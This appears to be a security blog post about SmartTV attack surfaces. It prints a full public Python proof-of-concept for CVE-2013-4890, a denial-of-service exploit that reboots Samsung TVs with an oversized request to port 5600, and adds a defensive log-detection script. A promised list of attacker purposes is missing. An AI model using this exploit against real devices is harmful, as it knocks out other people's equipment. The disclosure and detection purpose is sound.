SmartTV hacking is a reality: these devices are connected to the Internet and are exposed to cyber threats exactly like any other device. The principal security firms predict a bleak future for a large number of devices that we use daily; in a previous post on the “intelligent components” that surround us I anticipated the means and methods of these cyber offensives. The massive introduction of technology into our lives has dramatically increased our attack surface: we are all potential targets, and the majority of users have no awareness of the cyber threats.
It must be considered that in many cases these objects also manage a huge quantity of users’ data and personal information; in other cases they provide direct access to the user’s environment, such as the domestic LAN, or worse, the possibility of spying on victims through the camera or microphone that equips the device.
SmartTVs are considered privileged targets for the above reasons; an attacker could be interested in hacking our domestic appliances for the following purposes:
```python
#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"
```
“I discovered a DoS vulnerability on some Samsung TV devices. The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request, and as a result, the TV reboots… Tested successfully on my Samsung PS50C7700 plasma TV.”
In the video it is possible to observe that just after receiving the request the TV restarts and repeats the process. This means that an attacker with access to the LAN where the TV is installed is able to hack it, for example by designing malware that sends the requests from within a compromised LAN.
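From the defender's side, the condition described above (a long request to TCP/5600, repeated from a host inside the LAN) can be spotted in network logs. The following is an added example, not code from the original post or from the researcher: the log format, the sample records, the `/index.html` path and the 128-byte threshold are all constructed assumptions.

```python
import re
from collections import Counter

TV_PORT = 5600          # port of the DMCRUIS/0.1 web server named in the advisory
MAX_TARGET_LEN = 128    # assumed threshold; tune it to the longest legitimate request seen

# Constructed sample records in a hypothetical format:
# "<time> <src> -> <dst>:<port> <HTTP request line>"
SAMPLE_LOG = """\
2013-07-22T10:00:01 192.168.1.20 -> 192.168.1.50:5600 GET /index.html HTTP/1.1
2013-07-22T10:00:05 192.168.1.34 -> 192.168.1.50:5600 GET {long} HTTP/1.1
2013-07-22T10:01:10 192.168.1.34 -> 192.168.1.50:5600 GET {long} HTTP/1.1
2013-07-22T10:01:30 192.168.1.20 -> 192.168.1.50:80 GET /{long} HTTP/1.1
2013-07-22T10:02:15 192.168.1.34 -> 192.168.1.50:5600 GET {long} HTTP/1.1
""".format(long="A" * 300)

RECORD = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+):(?P<port>\d+) "
    r"(?P<method>\S+) (?P<target>\S+)"
)

def find_oversized_requests(log_text, port=TV_PORT, max_len=MAX_TARGET_LEN):
    """Return (time, source, destination, target length) for oversized requests to `port`."""
    alerts = []
    for line in log_text.splitlines():
        m = RECORD.match(line)
        if not m or int(m["port"]) != port:
            continue  # unparsable record, or traffic to another service
        if len(m["target"]) > max_len:
            alerts.append((m["ts"], m["src"], m["dst"], len(m["target"])))
    return alerts

def repeat_sources(alerts, min_hits=2):
    """Sources that keep sending oversized requests, as LAN malware retrying after each reboot would."""
    counts = Counter(src for _, src, _, _ in alerts)
    return {src: n for src, n in counts.items() if n >= min_hits}

if __name__ == "__main__":
    alerts = find_oversized_requests(SAMPLE_LOG)
    for ts, src, dst, length in alerts:
        print(f"{ts} {src} -> {dst}:{TV_PORT} request target of {length} bytes")
    print("repeat sources:", repeat_sources(alerts))
```

A source that shows up in `repeat_sources` is the host to isolate and examine first, since the TV itself is only the victim of the traffic.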
Who will manage the updates of these devices, and how?
Unpatched devices will be yet another opportunity offered to attackers for SmartTV hacking.
Pierluigi Paganini
(Security Affairs – SmartTV hacking)